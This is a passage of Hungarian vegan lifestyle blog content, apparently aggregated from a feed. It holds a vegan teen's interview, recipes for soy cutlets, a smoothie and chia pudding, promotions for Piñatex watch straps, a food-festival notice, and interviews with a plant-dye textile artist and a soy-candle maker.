(pl. szedsz-e vitamint, több vizet iszol, sportolsz, stb.)? Én világéletemben nagy sportoló voltam, mindig találok valami módot a mozgásra, heti ötször-hatszor sportolok (futok, erősítek, kondi terembe megyek, atlétikázom). Úgy gondolom, hogy egy helyesen összeállított vegán étrend mellett nincs szükségem tápanyag-kiegészítőkre, ezért nem szoktam nagyon szedni őket. Mostanában kezdtem el rengeteg vizet inni, aminek már most érzem a pozitív hatásait, egyszerűen csodálatos! Ezen kívül csak teljes értékű friss ételekre törekszem az étrendemben, attól érzem magam a legjobban! Hogyan érzed magad vegánként (egészségügyi, lelki szempontból)? Előtte nem nagyon figyeltem ezeket a dolgokat, de a mostanról tudok nyilatkozni. Egészségügyileg elég kicsattanónak érzem magam!! A vérképem szerint a testemben is minden rendben. Lelki szempontból, megtanultam a magam elfogadását, kevésbé vagyok előítéletes, próbálok új dolgok felé nyitni. Okozott-e problémát valaha a vegán étrend, életmód (pl. nem lehet vegán ételt kapni a suliban, egyetemen, az állandóan kíváncsiskodók kérdéseinek a megválaszolása, stb.)? Az iskolai étkezés sosem okozott gondot, már nagyon régóta nem az iskolai menzás ételt ettem, hanem mindig azt vittem, amit anyukám készített, később, ez a vegán ételeimmel sem volt máshogy, mindig azt vittem, amit itthon készítettünk. Pár hónapja már “csak” pár kiló gyümölcsöt viszek az iskolába. Azt talán kicsit macerás ide-oda cipelni, de nekem megéri!!! Az éttermekben evést mindig meg tudtam/tudom oldani egy “rizs, grillzöldség, steak krumpli, vagy kevert saláta rengeteg zöldséggel” rendeléssel. A kíváncsi kérdésekre mindig szívesen válaszolok, akár élőben, akár internetes oldalaimon, viszont a támadó jellegű agresszív véleményekkel nem nagyon látom értelmét szembeszállni. Melyik az az étel, ami olyan “guilty pleasure” féle, vagyis nem túl egészséges (még vegán formában sem), de mégsem tudsz neki alkalmanként ellenállni? Hát, az az igazság, hogy nem nagyon kívánom már az egészségtelen “junk food”-okat, de régebben a vegán pizza vegán sajttal, vagy a fánk volt az, amit ennek nevezhetnénk! Melyik a kedvenc vegán ételed? Hú, régebben a sütőben sütött krumpli chipsek volt ketchuppal, de most egyértelműen a banánfagyi, és a guacamole! Mit üzensz azoknak a fiataloknak, akik szeretnének áttérni a vegán étrendre, de még nem tették meg ezt a lépést? Valamint azoknak a szülőknek, akik aggódnak a vegán étrendre áttért gyermekükért? A fiataloknak mindenképpen azt üzenném, hogy informálják magukat amennyire csak tudják, és csak kezdjék el! Mindent a legnehezebb elkezdeni, de a folytatás már csak élvezet! Ez a legjobb dolog, amit csinálhatsz magadért, az állatokért, és a Földünkért! A szülőknek pedig azt mondanám, hogy kérdezzék gyereküket mindenről, engedjék, hogy a gyerekük megmutassa nekik a forrásokat, filmeket, cikkeket. Hihetetlen nagy változás ez egy családban szerintem, még jó, hogy az! Minden új, semmi sem a régi. De valahol mindig is az egészség lesz a legfontosabb, és remélem, hogy minden szülő egyszer el fogja ismerni ennek az életmódnak a pozitív hatásait, én ebben bízom, hiszek. Könyvek, amik szerintem nagyon jók tájékozódásra: – T. Colin Campbell: Kína-tanulmány – Michael Greger: Hogy ne halj meg? Aki már a nyers-vegánság iránt érdeklődne: – Dr. Douglas N. Graham: 80/10/10 Dokumentumfilmek, amiket mindenkinek látnia kell: Cowspiracy: weboldal, film Earthlings (Földlakók): weboldal, film (magyar felirattal) Forks over Knives: weboldal, film (trailer) What the Health: weboldal, film A legjobb beszéld, amit valaha hallottál – Gary Yourofsky: beszéd (magyar felirattal) Ha bármilyen kérdésetek felmerülne hozzám, megtaláltok: Instagramon: @veganlizm Youtube-on: @veganlizm
Pirított mustáros citromos szójaszeletek (laktózmentes, gluténmentes, vegán)
2017. október 18. Zizi kalandjai
Családi ebédre készültünk, így gondoltam, hogy kipróbálom (életemben először) a Veganz szója szeleteit. Még soha nem csináltam és nem is ettem ilyet… ha szójáról van szó, akkor tofu vagy tempeh formában fogyasztjuk leggyakrabban és még szójajoghurtot eszünk alkalmanként. A FB vegán csoportjaiban láttam egy-két izgalmas receptet ilyen szójaszeletekkel, de valahogy nem éreztem szükségét, hogy én ilyet egyek. Most ezt ajándékba kaptam, így gondoltam, hogy a családi ebéden bedobom, amikor a vendégek egy része húsevő. Sikert értem el vele, mindenkinek ízlett. Befűszerezve tényleg húsra emlékeztet, de nincsen hús íze (szójalisztből és vízből készül), csak az egész, ahogy tálaltam, ahogyan fűszereztem, az olyan volt, mintha valamilyen fűszeres húst ennénk burgonyapürével és pirított, sült zöldségekkel. A szójaszeleteket meg kell főzni sós vízben, leszűrni, aztán jöhet a fűszerezés és a pirítás. Én most mustárral és frissen facsart citromlével, valamint kakukkfűvel, pirospaprikával, fokhagymával és sóval fűszereztem. Nagyon finom lett. Egy 300 grammos csomag elég volt 6 felnőttnek és 2 kicsi gyereknek úgy, hogy sokféle köretet tálaltam mellé. Ha húsevő vendégeket várunk és jól akarjuk lakatni őket vagy csak kíváncsiak vagyunk, hogy milyen íze van a szójaszeletnek, akkor próbáljátok ki. Ha már a szójáról beszélek, akkor megemlítek egy Youtube videót, amibe tegnap futottam bele. Bonny Rebecca készített egy nagyon szuper videót a (démonizált) szójáról, feltéve a kérdést, hogy a szója tényleg rossze lenne-e számunkra? A videó bemutatja egy napját, hogy mit eszik és emellett jó sok infó elhangzik a szójáról! Hasznos! Pirított mustáros citromos szójaszeletek (laktózmentes, gluténmentes, vegán) Mentés Nyomtatás Előkészítési idő 10 perc Főzési idő 30 perc Teljes idő 40 perc Szerző: Zizi Recept típusa: ebéd, vacsora, főétel Konyha: vegán, gluténmentes Adag/mennyiség: 4-6 főre Hozzávalók 300 g Veganz szója szeletek 60 ml (65 g) dijoni mustár 3 gerezd fokhagyma, felaprítva 2 evőkanál olívaolaj 2 teáskanál füstölt pirospaprika 2 teáskanál szárított kakukkfű Himalaya só kevés víz Elkészítés Tegyük a szójaszeleteket egy lábasba, öntsük fel vízzel és sózzuk meg (2-3 teáskanál). Forraljukf el és főzzük 10 percig. Szűrjük le és tegyük félre. Egy tálban keverjük össze a pácot: mustárt, olívaolajat, pirospaprikát, kakukkfüvet, fokhagymát és sózzuk ízlés szerint. Tegyük bele a leszűrt szójaszeleteket és jól keverjük át, hogy a pác mindenhol befedje a szeleteket. Tegyük félre 10-15 percre pácolódni. Közepes láng felett hevítsünk fel egy serpenyőt, tegyük bele a pácolt szójaszeleteket és pirítsuk 3-4 percig. Adjunk hozzá egy kevés vizet, hogy ne égjen meg és legyen egy kis szaftja. Tálaljuk azonnal zöldségkörettel. Jegyzetek A legjobb frissen fogyasztva! 3.5.3226 ***** A zöldfűszeres mártás alapport a {Spar Magyarország} biztosította a recepthez. A véleményem csakis a sajátom.
Áfonya-fekete berkenye smoothie (laktózmentes, gluténmentes, vegán)
2017. október 2. Zizi kalandjai
Még nem meséltem nektek, de végre vidékre költöztünk a fővárosból. Na nem mentünk messzire, nagyon közel vagyunk Budapesthez, de mégis zöld övezetben, erdőkkel, dombokkal körülvéve. Van kertünk, ahol láttunk már mókust ugrálni a diófánkon, meg kétszer láttam két különböző napon, de ugyanabban az időben mezei egeret elillanni a szomszéd telekre – de bízom benne, hogy a szomszédoktól néha-néha a kertünkbe kóboroló macskák biztosítanak az egerek elriasztásától! Vannak tücskök, bogarak – nyilván sokkal többféle, mint amennyivel a 13. kerületben találkoztunk, meg vannak napon sütkérező, villámgyorsan elillanó gyíkok, tiszta, felsepert utcák, rengeteg diófa, vadgesztenyefa mindenfelé, végtelen csend, jó levegő és kedvesen ismerkedő, bőbeszédű nénik, bácsik (akiktől minden fontos információt megtudunk a nagyközségről). Gyalog távolságra van a waldorf óvoda, ami az álmunk volt, mert én és I. is úgy nőttünk fel (nagyobb vidéki városokban), hogy gyalog tudtunk menni az óvodába és az általános iskolába is. Mi is ezt szerettük volna, hogy ne kelljen zsúfolt tömegközlekedésen vagy autóban, dugóban ülve óvodába hordanunk a gyerekeinket. Még a berendezkedés fázisában vagyunk egy belülről felújított házban, szóval új konyhánk van (amelyen még egy kicsit dolgoznunk kell, hogy legyen belőle álomkonyha blogbejegyzés, amit már többen kértetek ), meg új fürdőszoba, wc, aludni tudunk min, de a bútorok egy része, a hangulat megteremtése (amit szeretnénk elérni) még hiányzik. Lassan dolgozunk rajta, de idő lesz mire mindennel megleszünk. A lényeg, hogy imádjuk ezt a helyet, a vidéki hangulatot, a nyugit, de az is szuper, hogy Budapest közel van, így bármikor könnyen a fővárosban tudunk lenni. De térjünk át erre a csoda sötét pink vagy lila smoothie-ra, ami a színét az áfonyától és a fekete berkenye portól kapja. De mi is az a feketeberkenye? Addig én sem tudtam, amíg ezzel a por formájú változattal nem találkoztam, így gondoltam, hogy utána nézek. Csodás színű fekete berkenye por A fekete berkenyének igen magas a gyümölcscukor-, pektin-és csersavtartalma. Ez utóbbi miatt, ha lét készítenek belőle – a teljesebb lényerés érdekében-, először fagyasztják, majd édesítik, valamint a kellemes ízhatás érdekében citromsavat is adnak hozzá. Kapható olyan készítmény, amely a fekete berkenyét természetes őrlemény formájában, esetleg más gyümölcsökkel együtt tartalmazza. Por formában többek között a Veganz német cég állítja elő Európában, amelyet itthon a Spar üzleteiben lehet most már megvenni. “A bogyókat egyébként sokféle módon használják fel, nem csak a kb. 80%-os létartalmát, hanem a főként a héjában lévő növényi színezőanyagot is élelmiszerek színezésére. Nagyon magas a C-vitamin tartalma, ezenkívül rendkívül hatékony gyulladáscsökkentő, illetve -megelőző hatása. Gyógyító értéke magas P-vitamin-(flavonoid), vízben oldódó B1-, B2-,B6-, B9-, B12-, C- és H-vitamin tartalmának, zsírban oldódó A-, E-és K-vitamin tartalmának és összességében kiemelkedően magas, a sejteket a pusztulástól védő szabadgyök-fogó kapacitásának köszönheti. A kutatók egyöntetű véleménye szerint összességében legalább olyan betegség-megelőző és gyógyító erővel rendelkezik, mint a tahiti csodanövény, a noni gyümölcse.” (Forrás: innen). Ehhez a smoothie-hoz a fekete berkenyét egy másik bogyós gyümölccsel, az áfonyával párosítottam. Csodálatos lett a színe és az íze is. A fekete berkenye por ugyanolyan minőséget képvisel, mint a mostanában nagyon felkapott acai por! Tehetjük kásákba, nyers süteményekbe, turmixokba. Áfonya-fekete berkenye smoothie (laktózmentes, gluténmentes, vegán) Mentés Nyomtatás Előkészítési idő 2 perc Főzési idő 5 perc Teljes idő 7 perc Csodás lila színű, vitaminokban gazdag turmix reggelire vagy uzsonnára. Szerző: Zizi Recept típusa: turmix, reggeli, ital Konyha: vegán, gluténmentes Adag/mennyiség: 2 főre Hozzávalók 2 db érett banán, meghámozva 1 és ½ bögre fagyasztott áfonya 160-180 ml kókuszos rizstej 6 evőkanál natúr kókuszjoghurt 2 evőkanál quinoa pehely 2 evőkanál fekete berkenye por 2 evőkanál kendermag por (opcionális) hántolt kendermag/tökmag/napraforgómag/kókuszchips, tálaláshoz Elkészítés A hozzávalókat tegyük turmixgépbe, és turmixoljuk 5 percig. Először csak 160 ml rizstejet adjunk hozzá, fokozatosan hígítsuk többel, ha hígabbra szeretnénk az italunkat. Jegyzetek A quinoapehely helyett tehetünk bele zabpelyhet, de ekkor nem lesz gluténmentes az italunk (kivéve, ha gluténmentes zabpelyhet használunk). A rizstej helyett használhatunk bármilyen más gluténmentes növényi tejet (kókusz-, vagy mandulatejet), illetve lehet zabtejjel is készíteni (szintén figyelni kell a gluténmentességre, akinél ez fontos). Ha a banánt is fagyasztva rakjuk bele, akkor egy sűrű, krémes, desszert szerű reggeli kását kapunk. Tálalhatjuk granolával is. 3.5.3226 ***** A fekete berkenye port, a kókuszos rizstejet a {Spar Magyarország} biztosította a recepthez. A véleményem csakis a sajátom. Kókusztálka a Coconut Bowls-tól.
Magyarországra is hozhattak a vegán nugátszeletből, amibe üvegdarab került
A Rossmann már levette a termékeit a polcokról.
Ismét startol a budapesti Vegan Food Fest – most a város tetején!
A WestEnd Tetőkertjére költözik szeptember második hétvégéjén Magyarország egyik legizgalmasabb gasztrofesztiválja, a kifejezetten növényi ételekre specializálódott Vegan Food Fest. Immáron negyedik alkalommal kerül megrendezésre a növényi ételek ünnepe védjegyet viselő Vegan Food Fest, ahol az érdeklődök betekintést nyerhetnek a növényi alapú ételek izgalmas sokszínűségébe. A rendezvény egyik különlegessége, hogy mindegyik kiállító egy olyan előétellel, főétellel vagy desszerttel készül, amelyet csak a négy napos rendezvény keretein belül lesz lehetőség kóstolni. Azaz sem a rendezvény előtt sem a rendezvény után, nem teszik étlapra a vendéglátó egységek a kifejezetten Vegan Food Festre megálmodott ételkülönlegességeiket. Az egyedi gasztro-kreálmányokon túl természetesen a sokak által megszokott ételek vegán megfelelőjét is lesz lehetőség majd beszerezni. Kóstolhat majd a nagyérdemű tejmentes fagylaltokat és jégkrémeket, vegán hamburgereket és hotdogokat, érlelt sajt és felvágott alternatívákat, nyers ételeket, és kihagyhatatlan veganizált magyar, valamint nemzetközi konyhai fogásokat. Magyarország kedvenc vegán, vegetáriánus és vegán-barát éttermei, cukrászdái, street foodosai és bisztrói gondoskodnak majd a négynapos ízkavalkádról. Neked csak azt kell eldönteni, hogy melyik finomságot kéred. Az ajánlat négy napig áll, ne hagyd ki ezt lehetőséget és látogass el szeptember 7. és 10. között a főváros központjában található WestEnd pláza parkosított Millenium Tetőkertjére. További információk a rendezvényről, illetve a kiállítókról a facebook eseményre kattintva megtekinthetők: https://www.facebook.com/events/164274440802945 Helyszín: 1062. Budapest, Váci út 3. (WestEnd Millenium Tetőkert) Dátum: 2017.09.07.-10. Nyitva tartás: 10:00 – 22:00 Belépő: A rendezvény ingyenes! The post Ismét startol a budapesti Vegan Food Fest – most a város tetején! appeared first on VegaNinja.
Ingyenes kiszállítás és személyes átvétel Magyarország első vegán fashion shopjában
A VegaNinja shopban újfajta átvételi módokat vezettünk be. Mindenki szereti, ha nem kell az átvételért fizetni, mi is. Ha 15 000 Ft felett vásárolsz, átvállaljuk tőled a szállítási költséget, és ingyen kivitetjük a rendelésedet bárhová az országban! Nézz szét a folyamatosan bővülő termékkínálatunkban! Ezen kívül Budapesten személyes átvételre is van mód. A Király utca 93 szám alatt található Héjakút Biobolt és Drogériában is átveheted a tőlünk rendelt termékeket, egyúttal pedig el tudod akár intézni a bioboltos bevásárlást is. És egyébként a biobolt pont a rózsa utcai Napfényes és a Kozmosz étterem között van fél úton. *kacsint* The post Ingyenes kiszállítás és személyes átvétel Magyarország első vegán fashion shopjában appeared first on VegaNinja.
Csokis-vaníliás chiapuding
A köztudatban chia magnak hívják, a tisztes magyar neve azonban aztékzsályamag. Mexico és Guatemala területein honos leginkább. Aki hallott már a chia magról, az bizonyára hallotta azt is, hogy nagy arányban tartalmaz rostot. Magas rost tartalma (18-30%) miatt fontos szerepet játszhat a napi ajánlott rostbevitel biztosításában. Azt talán már kevesebben tudják, hogy szintén szép arányban tartalmaz fehérjét, omega-3 és omega-6 esszenciális zsírsavakat. Pont magas rosttartalma miatt túlzott fogyasztása emésztőrendszeri problémákat is okozhat, ezért napi 15 gramm chia magnál nem ajánlatos többet fogyasztani. Nyersen sose fogyasszuk a magvakat, mivel különleges képességük, hogy súlyuk többszörösét képesek folyadékban megkötni. Ha nyersen kerül a gyomorba, ott fog megdagadni, ami kellemetlen lehet. Felfújódást, hasi problémákat, rosszullétet okozhat. Fontos, hogy fogyasztás előtt legalább 10 percig áztassuk vízbe, növényi tejbe, magtejekbe, vagy gyümölcslébe, de ne keverjük olajokkal. Óvatosan szoktassuk hozzá a szervezetünket a chia maghoz, kis adagokkal kezdve. Mindig figyeljünk arra, hogy chiamag fogyasztása után (legyen az müzliben, pudingban vagy más ételben) bőséges folyadékot vigyünk be a szervezetünkbe, így elkerülve a hasi panaszokat. Kerülendő a magas zsírtartalmú étellel keverése, mivel megfekszi a gyomrot. Nem ajánlott együtt fogyasztani alkohollal, mert fokozza annak vízürítő hatását. Mindemellett nagyon sok jó tulajdonsága van, jelentős a kálium, magnézium és antioxidáns tartalma. Ennek köszönhetően több energiát ad, valamint szabályozza az emésztést. Segítő társ lehet fogyókúrában, mivel fogyasztása telítettségérzést okozhat. Elsősorban reggelire vagy ebédre fogyasszuk. Ha mégis az alábbi pudingot estére tálalnánk a vendégeknek, kis mennyiséget szervírozzunk és adjunk a vendégeknek bőséges italt (vizet vagy lágy teát esetleg gyümölcslevet) a puding után. A recept Hozzávalók: - 4 dl növényi tej - 4 ek chia mag - agavé szirup - karob vagy kakaópor vagy olvasztott csoki - vanília - barack (vagy idénygyümölcs) Elkészítés: Ha csokis-vaníliás chiapudingot szeretnénk készíteni, akkor felezzük el a növényi tejet (2-2dl). Az egyiket keverjük ki kakaó vagy karobporral és agavé sziruppal, vagy olvasszunk fel egy kevés (kb 30 gramm) étcsokit és keverjük a növényi tejhez. A növényi tej másik részét melegítsük fel vanília kikapart belsejével vagy vanília esszenciával. A fehér és barna színű tejekhez adjuk hozzá a magokat, tegyük hűtőbe. Egy éjszaka alatt magába szívják a folyadékot, de pár óra is elegendő idő arra, hogy megdagadjanak és puding állaga legyen. Poharakba adagoljuknés a tetejét pl. barackkal vagy más idény gyümölccsel díszitjük. A képen látható puding során a csokishoz szójatejet a vaníliáshoz rizstejet használtam. Mindkettővel egyformán jól elkészíthető.
Vegán életmód – Botanika + nyereményjáték
2017. július 27. Zizi kalandjai
Nem is tudom hol találkoztam először Sára munkáival, de valahol az interneten futottam bele és valami hasonló fotóba, mint, amit a második képen láttok, sok-sok növényekkel festett pasztell színű sokaság volt a fotón és egyből arra gondoltam, hogy én mindegyikből szeretnék egyet, mert az ilyen színes dolgokra csak egyszerűen jó ránézni. Engem legalábbis nagyon felvidít egy ilyen kép. Egyből írtam is Sárának, hogy lenyűgöznek a munkái, imádom a csodaszép színeket, amelyeket elővarázsol! Igen, elővarázsol, mégpedig növényekből, festőnövényekből. Nagyon érdekes és kreatív a munkája, amelyet most ebből az interjúból megismerhettek. Szóval fogjátok a kezetekbe a reggeli turmixotokat, kávétokat, teátokat, dőljetek hátra és olvassátok el Sárával készített interjúmat. Nyereményjáték pedig az interjú után! Bemutatnád magad röviden, ki vagy, mivel foglalkozol? Hajgató Sára vagyok, textilekkel, azon belül is festőnövényekkel színezett anyagokkal foglalkozom, ruhákat illetve kiegészítőket készítek azokból az anyagokból, amiket megfestek. Hogyan jött az ötlet, hogy növényekkel kezdjél festeni textileket? Évekig volt egy ékszermárkám, azonban az idők múlásával egyre inkább elkezdett foglalkoztatni a textilek és fonalak természetesebb megszínezése, elkezdtem utánajárni, kisérletezni, és megnyílt előttem a festőnövények csodás világa. Nagyobb rálátást szerettem volna a munkámban felhasznált alapanyagok eredetére és a magam módján szerettem volna tenni egy keveset a környezetterhelés csökkentéséért. Mely növények a legalkalmasabbak arra, hogy fessünk velük? Rengeteg növénynek van színezőpotenciálja azonban ezen belül van egy szűkebb csoportja a hagyományos festőnövényeknek, amelyek igazán időtálló, szép színeket eredményeznek. Az európai kultúrkörben a három ún. “nagy festőnövény” a festőcsülleng, a festőrezeda és a festőbuzér, színkeveréssel ebből a három alapfestékből temérdek gyönyörű árnyalatot hozhatunk létre. A növény megválasztása mellett a festendő alapanyag és a textil előkezelése is meghatározza a színeredményt. Melyik volt a legkülönlegesebb növény, amit használtál textilfestésre vagy az a növény, amelyiken meglepődtél, hogy milyen csodás színt lehet kihozni belőle? Igazán különleges élmény indigóval festeni, a folyamat maga is merőben eltér a többi festőnövénnyel való munkától, ezért ezt kimondottan szeretem. Festettem már elhervadt esküvői csokorral is textilt, ez is egy szép, és különleges módja volt a “Nagy Nap” megörökítésének. Honnan szerzed be a festéshez használandó növényeket (vadon gyűjtés, lehet kapni boltban, online, külföldről)? Sok növényt gyűjtök, szerencsére jópár inváziós faj, például a kanadai aranyvessző remek festőalapanyag, így nem kell visszafognom magam. Van néhány növény, amit kertben termesztek, nagy álmom, ami ha minden igaz a közeljövőben meg is valósul, egy kimondott festőnövény ültetvény és bemutatókert létrehozása. Ezen kívül néhány egzotikus festőnövényt külföldről, európai, méltányos kereskedésekből szerezek be, és számos konyhai hulladék is alkalmas textilszínezésre. Milyen anyagokat festesz be ezekkel a növényi festékekkel? 100%-ban természetes szálösszetételű anyagokkal dolgozom, a kedvencem a len. Milyen termékek készülnek az általad festett anyagokból? Ezeket is teljesen te készíted? Ruhadarabokat készítek: megkötős ruhát, nadrágszoknyát, felsőket és kabátkákat tartalmaztak az eddigi kollekcióim, illetve az ezekhez kapcsolódó kiegészítőket, textil nesszeszert, kendőket, fonott nyakláncokat és karkötőket. Dolgozom egy lakberendezési kollekción, illetve külön öröm, amikor időm engedi, hogy fonalat fessek, amikből szövőszéken szövött kelméket hozok létre. Mennyire tartósak a növényekkel, természetesen befestett anyagok? Egy ilyen anyagból készült felsőt hogyan lehet mosni, hogy minél tovább megőrizze csodaszép színét? Egy kicsit gondosabb, tudatosabb kezelést igényelnek a festőnövényekkel színezett holmik – kézimosást, és PH-semleges mosószert javaslok a vásárlóimnak, illetve azt, hogy ne tegyék ki huzamos ideig tűző napsütésnek a darabokat. A megfelelően előkezelt textilen sokáig szép marad a szín, de én nem látok abban sem problémát, ha az ember időről-időre felfrissíti és újrafesti egy-egy kedves ruháját. Van-e olyan recepted, amely alapján bárki otthon a konyhájában tud például egy színes konyharuhát készíteni? Eső körben érdemes háztartásban fellelhető alapanyagokkal kísérletezni, ilyen például a hagymahéj, a kurkuma vagy a lilakáposzta. Ezek nem tartoznak a legtartósabb színezőanyagok közé, de azonnali sikerélményt adnak. A textilt érdemes timsóval előpácolni, majd készítünk egy festőlevet, amiben forralás nélkül egy jó órát főzzük a textilt. Hol érhetők el a termékeid, hol lehet megvásárolni ezeket a színes csodákat? Van egy bemutatótermünk, a CikkCakk Stúdió amit 3 kedves tervezőtársammal hoztunk létre, itt megtekinthetők a munkáim, illetve szoktam vásározni is, és készül a webshoppal egybekötött honlapom is. Sára elérhetőségei: – Botanika Facebook – Botanika Instagram – CikkCakk Stúdió Facebook ***** NYEREMÉNYJÁTÉK!!! Nyeremény : 1 darab indigóval festett-shibori technikával mintázott vászontáska. Írjátok meg ide a bejegyzés alá kommentben, hogy ti mit szeretnétek egy növénnyel festett csodaszép anyagból készíttetni magatoknak (sál, nyaklánc, szoknya, stb.)! Szabályok : A kommentelésen felül plusz pontokért lájkolhatjátok Sára Facebook és Instagram oldalát (írjátok meg ezt is a kommentben, ha megtettétek). 2017. július 30-ig lehet játszani. Sorsolás a random.org-gal. Eredményhirdetés 2017. július 31-én. A nyertest emailben fogom értesíteni, majd a neve kikerül a blogra (ez a bejegyzés fog frissülni). A nyereményt a nyertesnek Sára postázza magyarországi címre vagy személyesen átvehető a CikkCakk Stúdióban, Budapesten.
Megérkeztek a Pi?atex szíjas karórák a webshopba!
Végre megérkeztek a Pi?atex szíjas VOTCH vegán karórák a webshopba! Rozsdamentes acél óraházzal, letisztult stílusban. Vegán, környezetbarát, bőrbarát anyagok és stílusos megjelenés jellemző a VOTCH márkára, melynek alapítója és egyszemélyes tulajdonosa etikai vegán, bevételének egy részét vegánsággal foglalkozó szervezeteknek adja. Két különböző szélességben és 5 különböző színben kapható, de a VOTCH további kollekcióiban rengeteg más színvariációt is megtalálsz. A Pi?atex szíjas órákat itt tudod megvásárolni: http://shop.veganinja.hu/termekkategoria/kiegeszitok/orak/pinatex_kollekcio/ A Pi?atexről itt írtam korábban, azt érdemes róla tudni, hogy ananászlevél-rostokból készítik, ami egyébként az ananásztermelés mellékterméke. Ennél fogva semmilyen plusz vízfelhasználás és extra termőföldigény nincsen, gyakorlatilag a hulladékot hasznosítják a csodaanyag létrehozásához. Erős, puha, állati bőrre hajazó textilbőr, amely teljesen vegán, ráadásul bőrbarát. Akár magadnak, akár ajándékba egy vegán családtagodnak, barátodnak szeretnéd megvásárolni az órát, kedvező feltételekkel teheted meg, mert olcsóbban adjuk, mint a gyártó, hiszen Magyarországon kevesebbet keresnek az emberek. Mi így szeretnénk hozzájárulni ahhoz, hogy etikus, vegán, környezetbarát és méltányos körülmények között gyártott termékeket választhass. [ Válaszd ki most a kedvencedet a VOTCH vegán órák közül! ] The post Megérkeztek a Pi?atex szíjas karórák a webshopba! appeared first on VegaNinja.
Etikus és környezetbarát bőralternatíva – a Pi?atex
Egyre több természetes bőralternatíváról lehet olvasni a hírekben. Az egyik ilyen anyag a Pi?atex(TM), amely magyar nyelvterületen furcsán hangzik, de nevét az ananászról kapta. Mert ananászlevelekből készül, és a kész terméknek a bőrhöz nagyon hasonló tulajdonságai vannak. Bőrt hordani egyre inkább kínos, hiszen szinte mindenhol lehet róla olvasni, milyen áron kerül a boltokba. Nemcsak horrorfilmbe illő módon készül, de a közhiedelemmel ellentétben egyáltalán nem környezetbarát. Erről bővebben Holy Ducknál olvashatsz. A Pi?atex(TM) ezzel szemben egy teljesen vegán “műbőr” alternatíva. Az ananász leveleinek rostjaiból készül. Ezek a levelek egyébként hulladékként végeznék, korábban nem volt rájuk szükség és nem tudták hasznosítani. A Pi?atex(TM) a legújabb technológiát használja, hogy létrehozza ezt a tartós és rendkívül környezetbarát anyagot. A gyártás egy része a Fülöp-szigeteken zajlik, ahol az ananászt egyébként is termesztik, sem extra víz, növényvédőszer vagy termőföld nem szükséges hozzá, de plusz bevételhez juttatja az ananásztermelő farmereket. A gyártás további részét az Egyesült Királyságban és Spanyolországban végzik. Dr. Carmen Hijosa, a Pi?atex(TM) feltalálója sok kutatás és fejlesztés után akkor ért el áttörést, mikor rájött, hogy az ananászlevél-rostokból szövés nélkül is előállítható ez a természetes és fenntartható alapanyag. Dr. Carmen Hijosa, a Pi?atex feltalálója – A Pi?atex(TM) kiváló minőségű szuperanyag, hiszen erős, változatos módon felhasználható, lélegző textilbőr, ami puha, rugalmas, szabható, varrható és lehet rá nyomtatni is. Rengeteg tesztnek vetik alá. (Ezek természetesen nem állati tesztek, hanem az anyag teherbírására vonatkoznak.) – Teljesen vegán, nem használnak sem állati teszteket, sem állati eredetű anyagokat hozzá. – Fenntartható és környezetbarát, hiszen melléktermékből készül, semmilyen víz, termőföld vagy vegyszerráfordítás nem szükséges a betakarításához. – Változatos, mert különböző vastagságban és színben kapható, terméktől függően. – Miután a rostokat kinyerik az ananászlevelekből, biomassza keletkezik, amit természetes növényi trágyaként használnak, és szintén extra jövedelmet biztosít a farmereknek. Magyarországon még annyira nem elterjedtek a Pi?atexből készült termékek, de pl. babamokaszinként kapható, és Magyarországon elsőként a VegaNinja shopban VOTCH vegán órák szíjaként. VOTCH vegán karórák Pi?atex szíjjal >> Vásárolj Pi?atex órákat most, a gyártó árainál olcsóbban!
Ki nem találná, miből kéne többet enniük a magyaroknak
Idén ismét zöldség- és gyümölcs-fogyasztást ösztönző kampányokat szervez a Nemzeti Agrárgazdasági Kamara (NAK). Elsőként júniusban a Magyarországon termesztett gombákat, a csiperkét és a laskagombát népszerűsítik.
Vegán életmód – Greenway Design + Nyereményjáték
2017. május 16. Zizi kalandjai
Amikor először belefutottam Ildi munkájába, akkor realizálódott bennem, hogy lakberendezni is lehet vegánul, vagyis életmódot teremteni is lehet vegánul. Ő ugyanis azon felül, hogy dekoratőr és blogger, még környezettudatos is, egyfajta “zöld” szemüvegen keresztül figyeli a világot. Mindezek mellett 100% eco szójaviaszból készít gyertyákat, amelyek kizárólag természetes alapanyagok felhasználásával készülnek, nem tartalmaznak mérgező paraffint és más kőolajszármazékot, szennyeződést és 100%-os tisztaságú illóolajaival illatosítja őket. Szóval fogjátok a kezetekbe a reggeli turmixotokat, kávétokat, teátokat, dőljetek hátra és olvassátok el Ildivel készített interjúmat. Megosztja velünk saját történetét, ő hogyan lett vegán és hogyan lett a lakberendezés szerelmese. Nyereményjáték pedig az interjú után! Csapó Ildikóval beszélgettem az alkotásról, a vegánságról, a gyertyáiról... Bemutatnád magad röviden, ki vagy, mivel foglalkozol? Csapó Ildi vagyok, dekoratőr, blogger. 2014-ben döntöttem úgy, hogy a jelenlegi főállásom mellett belevágok egy kreatív szakmába és végre megvalósítom, amiről évek óta álmodoztam. Elkezdtem a dekoratőr iskolát, majd folytattam a lakberendező szakkal. Nagyjából ezzel egyidőben kezdtem el rendszeresen bejegyzéseket írni a Greenway blogba, melynek hivatalos indulása 2015-ben volt, de előtte már évek óta próbáltam írni; néha ki is került egy-egy bejegyzés, de sohasem lett folytatás. A Greenway Design az elmúlt két és fél évben rengeteg változáson ment keresztül, miközben én is sokat fejlődtem és ma már tisztán látom, hogy az életmódom nagy hatással van arra is, ahogyan a blogot vezetem. A mottóm a “Tudatos dekor, tudatos tér” tulajdonképpen öszefoglalja azt a természetközeli és következetes látásmódot, amit az olvasóimnak szeretnék sugallni az írásaimmal és a képeimmel. Imádom az újrahasznosítást és az apró DIY megoldásokat, valamint a balkonkertészkedést. A Greenway blog egy olyan otthon kialakítsához nyújt inspirációkat, melyben végtelen lehetőségek vannak az újragondolásra, a kreatív megújulásra. Hogyan kezdődött nálad a vegánság (először étrend váltással, aztán az élet más területére is bevezetted)? A családod is így étkezik? Életem két fő mozgatórugója a kreatívitás és a “zöld” szemlélet. Ez a két dolog olvad össze és bontakozik ki a Greenway Design blogjában is, ezek az az én kis belső motorjaim. Gyermekkorom óta mániákusan szeretem az állatokat. Viccesen hangzik, de kislányként – a játék babakocsiban nekem nem baba volt, hanem kiskacsa, kispulyka, kiscsibe. Természetesen mindnek neve volt és húgommal órákon át játszottunk velük. Amikor megnőttek, akkor is gondjukat viseltük. Iskolából hazatérve, minden nap szenteltünk nekik egy kis időt, hogy megszeretgessük őket. Voltak viszont a ház körül olyan állatok is, akiknek nem adhattunk nevet, mert már születésükkor mondták szüleink, hogy nem élhetnek sokáig. Egy apró békés megyei faluban nőttem fel, ahol a 80-as és 90-es évek fordulóján nem sok pénzkereseti lehetőség volt és a mezőgazdaság mellett az 